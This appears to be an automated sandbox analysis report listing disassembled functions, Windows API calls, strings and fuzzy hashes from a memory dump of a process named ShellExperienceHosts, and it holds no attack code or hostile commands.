Function 6CAF5824 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CAF583A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f14b98d43bdd8a8e6bd78383ba48f27e346fade425b2a64ae26877a7423705f3
Instruction ID: 28c6cfc04ee47d6467b3ea30600dd86d7068b7d07565a1ecaa4106697871bbc0
Opcode Fuzzy Hash: f14b98d43bdd8a8e6bd78383ba48f27e346fade425b2a64ae26877a7423705f3
Instruction Fuzzy Hash: EAA13EB1B027098FDB14CF55C491699BBF5FB4A328F28816AE425EB790E3749981CF90

Function 6CB1C772 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CB1C7C6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f25a36446b6797dfa1e7dcd4683c692f5e078b8061bd6fd7d41680d0a646ef7c
Instruction ID: 26db67bd8301703100256500fa4a1335b112c60eb0660937ee0ba9db86198653
Opcode Fuzzy Hash: f25a36446b6797dfa1e7dcd4683c692f5e078b8061bd6fd7d41680d0a646ef7c
Instruction Fuzzy Hash: 9821F872609286ABEB18AE65DC81EBE37BCEF04319F100179ED05C6E40EB74E944C751

Function 6CB1C3F9 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

EnumSystemLocalesW.KERNEL32(6CB1C51F,00000001,00000000,?,-00000050,?,6CB1CB53,00000000,?,?,?,00000055,?), ref: 6CB1C46B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 04ab23cbbb20c14a246593b4dad8a56aa00e7811af85fd77e6e212889a7da685
Instruction ID: 65909c0c611424d03b04fc9212d00ef1a5bb0db9ecd5c54a1e1ed40a919d2a32
Opcode Fuzzy Hash: 04ab23cbbb20c14a246593b4dad8a56aa00e7811af85fd77e6e212889a7da685
Instruction Fuzzy Hash: D611C6362087419FDB18AF7A88915BEBBA2FF80768B18453DDA8647E40D771B942C740

Function 6CB1C9A1 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6CB1C73B,00000000,00000000,?), ref: 6CB1C9CD

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 8d23425074d18e630304f51856cf4a2a70a14aae7e13a1ec61852fccd9461a9b
Instruction ID: cbc30c968eddfd45c8a2015d1d0693976508606a4895eca78662d51288e97572
Opcode Fuzzy Hash: 8d23425074d18e630304f51856cf4a2a70a14aae7e13a1ec61852fccd9461a9b
Instruction Fuzzy Hash: 30012632758196ABDB18AA698805BBE37A8EB407D8F104439DC56F7D80EA30FE41C6D0

Function 6CB1C307 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6CB1C35B

Strings

utf8, xrefs: 6CB1C2CA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: ad65f7bbe520ac22b62d2d39da5a3593accdb1b32ed03b06f13599521acd98e5
Instruction ID: bc745dd79748241954054d47fc7bf9cd0805fbadcca249348d6d21ad1beb5934
Opcode Fuzzy Hash: ad65f7bbe520ac22b62d2d39da5a3593accdb1b32ed03b06f13599521acd98e5
Instruction Fuzzy Hash: FBF0F432700295ABC714AA78D849AFE33ACEB45718F000179A616DB640DB74AD098790

Function 6CB1C494 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

EnumSystemLocalesW.KERNEL32(6CB1C772,00000001,?,?,-00000050,?,6CB1CB1B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6CB1C4DE

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f1d06ef44059755bfaff27aa77166b9df30c167743b59ac9677a4e78252b11b3
Instruction ID: 151ed9ab7dda96fff5df3afa9f4e45781112128184d1ec410ff418cd11bc07ee
Opcode Fuzzy Hash: f1d06ef44059755bfaff27aa77166b9df30c167743b59ac9677a4e78252b11b3
Instruction Fuzzy Hash: 1AF0F6363083845FD7246F7AD880ABA7BA1FF8136CF15853DEA458BE50C7719941D750

Function 6CB118E5 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB0D9E7: EnterCriticalSection.KERNEL32(-6CB8FE48,?,6CB04D47,?,6CB81388,00000008,6CB04EF7,?,?,00000000,3E6EA3C2,?,00000000), ref: 6CB0D9F6

EnumSystemLocalesW.KERNEL32(6CB118D8,00000001,6CB815F8,0000000C,6CB11D4D,00000000), ref: 6CB1191D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 76913418b4a5f97bce476ca05786a421c210ac493c401292ed37c5f12be1fc62
Instruction ID: 42cc482e5e56d51a904d4545bc7f0ff5d1de8314786641b1d0d66ab0ee4ffdaf
Opcode Fuzzy Hash: 76913418b4a5f97bce476ca05786a421c210ac493c401292ed37c5f12be1fc62
Instruction Fuzzy Hash: AFF04976B01280DFDB00DF98E505B9D7BB0EF4A325F10411AE425EB790CB758948CF51

Function 6CB1C3AE Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB0E9F9: GetLastError.KERNEL32(00000000,?,6CB1849B), ref: 6CB0E9FD
Part of subcall function 6CB0E9F9: SetLastError.KERNEL32(00000000,?,?,00000028,6CB0E454), ref: 6CB0EA9F

EnumSystemLocalesW.KERNEL32(6CB1C307,00000001,?,?,?,6CB1CB75,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6CB1C3E5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 98235a749a9be7be8a19d1ebf086576a314de871f0606095181e971dd6e799df
Instruction ID: 99a7d2f5f3c2465910c93329d7b5948c3bd75f11eb7413e7f35a43527bc2f81a
Opcode Fuzzy Hash: 98235a749a9be7be8a19d1ebf086576a314de871f0606095181e971dd6e799df
Instruction Fuzzy Hash: B8F0EC363042C557C704AF7AE84466F7F64FFC2728B0A4069EA058BE50C6719846C754

Function 6CB11E51 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6CB112DC,?,20001004,00000000,00000002,?,?,6CB108CE), ref: 6CB11E85

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b58233a3599ac5215a635744538c1e817d92fae2fc2ce5add9f10837f1f5db0f
Instruction ID: 6551bd14ff6faa39f455a8a410305043f7796629727a2d8a95cd12896d240e32
Opcode Fuzzy Hash: b58233a3599ac5215a635744538c1e817d92fae2fc2ce5add9f10837f1f5db0f
Instruction Fuzzy Hash: 3CE04F3650559DBBCF222FA0DC04E9F3F35EF55750F094521FC1966A10CB32C921AAE1

Function 6C9BBE2F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 6C9BBE3B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: b8d0806557073e329e2f73e2ff9f3b59aea055f28eb45800f9addd54eb44f78b
Instruction ID: d46fa98cc971932a4545ef26807bc898a648e83cb523ebe29973ad73936eb3f3
Opcode Fuzzy Hash: b8d0806557073e329e2f73e2ff9f3b59aea055f28eb45800f9addd54eb44f78b
Instruction Fuzzy Hash: A8D012311157A0DBC7255A29EC84BDB73F9BF0972AB05052DE54A628B4D7B0E9C0C7C0

Function 6CAFE975 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d357d2dc2a3ff9e42462198b33b1c97fa22b02a4e3f7d1e23e0efe23bf042f
Instruction ID: 88de35aea63c674382b8d74909eabf36a4aa47a5407f6febacc92f4f6d98352a
Opcode Fuzzy Hash: 65d357d2dc2a3ff9e42462198b33b1c97fa22b02a4e3f7d1e23e0efe23bf042f
Instruction Fuzzy Hash: 03C1B37050564A8ECB11DF68C5906AABBB1BF06308F184659F4B297F91C331E5CBCBD1

Function 6CAF9AD0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9e5ed42330de3ed7e14ae2a2c375a3cb1aba597bc5714e19a7e68808955a91ad
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 2C11087726205243D2059D3ED6F06A7A399EAC622CF3C43BAF1714BE58D233E1C79900

Function 6CA39A1B Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 327fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CA39A25
GetModuleFileNameW.KERNEL32(00000000,?,00000104,6CB345FC,00000000,6CB42864,00000000,6CB316EC,00000000,?,?,00000A88,6CA3AC67,?,00000000,00000038), ref: 6CA39AC4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,6CB316EC,00000000,?,?,00000A88,6CA3AC67,?,00000000,00000038), ref: 6CA39B77

Strings

, xrefs: 6CA39E62

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: File$CreateH_prolog3_ModuleName
String ID:
API String ID: 3408945735-3916222277
Opcode ID: be185325ccdd05a0b80348b8182af8476a38a9a7228cb07763c1708d35abdc21
Instruction ID: 2f6f2770dc9630503f14d0dd254e57f36d2431edd4def551f84041a16904a755
Opcode Fuzzy Hash: be185325ccdd05a0b80348b8182af8476a38a9a7228cb07763c1708d35abdc21
Instruction Fuzzy Hash: D7C15D72A00624ABEF219F60CD54FEE77B8AF5A314F144198F90DE2990DB349A84CF52

Function 6C9A1C24 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 42registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(Native), ref: 6CAF47A1
RegisterWindowMessageW.USER32(OwnerLink), ref: 6CAF47AE
RegisterWindowMessageW.USER32(ObjectLink), ref: 6CAF47BC
RegisterWindowMessageW.USER32(Embedded Object), ref: 6CAF47CA
RegisterWindowMessageW.USER32(Embed Source), ref: 6CAF47D8
RegisterWindowMessageW.USER32(Link Source), ref: 6CAF47E6
RegisterWindowMessageW.USER32(Object Descriptor), ref: 6CAF47F4
RegisterWindowMessageW.USER32(Link Source Descriptor), ref: 6CAF4802
RegisterWindowMessageW.USER32(FileName), ref: 6CAF4810
RegisterWindowMessageW.USER32(FileNameW), ref: 6CAF481E
RegisterWindowMessageW.USER32(Rich Text Format), ref: 6CAF482C
RegisterWindowMessageW.USER32(RichEdit Text and Objects), ref: 6CAF483A

Strings

OwnerLink, xrefs: 6CAF47A7
Native, xrefs: 6CAF479A
FileNameW, xrefs: 6CAF4816
Embed Source, xrefs: 6CAF47D0
Rich Text Format, xrefs: 6CAF4824
Object Descriptor, xrefs: 6CAF47EC
Link Source Descriptor, xrefs: 6CAF47FA
FileName, xrefs: 6CAF4808
ObjectLink, xrefs: 6CAF47B4
RichEdit Text and Objects, xrefs: 6CAF4832
Link Source, xrefs: 6CAF47DE
Embedded Object, xrefs: 6CAF47C2

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1814269913-2889995556
Opcode ID: 676d25de956e9df03ffe48aa11d2ebe6a79b6d4e9dfe37fb8f0165ef30dd9f35
Instruction ID: 96048d57ac0dd8715ac2dabbd3f4d30e0733d06a7a211fb330698abef0e85944
Opcode Fuzzy Hash: 676d25de956e9df03ffe48aa11d2ebe6a79b6d4e9dfe37fb8f0165ef30dd9f35
Instruction Fuzzy Hash: EB1115759547C0DFCFB49FB1A80C44E7AF0EE0A6223804D19F55A97A00DB38A490CFC5

Function 6C9BFE44 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 413windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9BFE4E
GetClassNameW.USER32(?,00000000,00000001), ref: 6C9BFE99

Part of subcall function 6C9B97C4: GetParent.USER32(00000000), ref: 6C9B97F0

SendMessageW.USER32(?,0000041C), ref: 6C9BFF8C
SendMessageW.USER32(?,00000409,?,?), ref: 6C9BFFA1
GetClassNameW.USER32(?,00000000,00000001), ref: 6C9BFFC9
SendMessageW.USER32(?,00000418,00000000,00000000), ref: 6C9C005A
SendMessageW.USER32(?,0000041D,-00000001,?), ref: 6C9C0076
IntersectRect.USER32(?,?,?), ref: 6C9C0088
CreatePopupMenu.USER32 ref: 6C9C00EE
CreateCompatibleDC.GDI32(?), ref: 6C9C0106
CopyRect.USER32(?,?), ref: 6C9C01F1
OffsetRect.USER32(?,?,?), ref: 6C9C0207
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9C0227
GetSysColor.USER32(00000004), ref: 6C9C0276
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 6C9C035E
CopyRect.USER32(?,?), ref: 6C9C037B

Strings

0, xrefs: 6C9C00A8
ToolbarWindow32, xrefs: 6C9BFFA7, 6C9BFFEF
ReBarWindow32, xrefs: 6C9BFE78, 6C9BFEBB

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageRectSend$Create$ClassCompatibleCopyMenuName$BitmapColorH_prolog3_InsertIntersectItemOffsetParentPopup
String ID: 0$ReBarWindow32$ToolbarWindow32
API String ID: 4204073102-333968262
Opcode ID: 5152d7f167018169a7fb22a2ae5268e5f73e72a6e231dfb87f4f9d99b7470a72
Instruction ID: b85cc726d69e5cba823d750e4e15d002c19449a041137967d1a4b6637e54c1e8
Opcode Fuzzy Hash: 5152d7f167018169a7fb22a2ae5268e5f73e72a6e231dfb87f4f9d99b7470a72
Instruction Fuzzy Hash: 4B021B71A00169ABDF25DB60CC94FEEB779BF65308F0041D9E50AB7A50DB309A89CF51

Function 6C9B8B27 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 179windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE4F7: GetWindowLongW.USER32(00000004,000000F0), ref: 6C9BE504

GetParent.USER32(6C9BCD3D), ref: 6C9B8B68
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C9B8B8A
GetWindowRect.USER32(6C9BCD3D,?), ref: 6C9B8BAE
GetWindowLongW.USER32(00000000,000000F0), ref: 6C9B8BCE
MonitorFromWindow.USER32(00000000,00000001), ref: 6C9B8C07
GetMonitorInfoW.USER32(00000000), ref: 6C9B8C0E
CopyRect.USER32(?,?), ref: 6C9B8C1C
GetWindowRect.USER32(00000000,?), ref: 6C9B8C29
MonitorFromWindow.USER32(00000000,00000002), ref: 6C9B8C36
GetMonitorInfoW.USER32(00000000), ref: 6C9B8C3D
CopyRect.USER32(?,?), ref: 6C9B8C4B
GetParent.USER32(6C9BCD3D), ref: 6C9B8C55
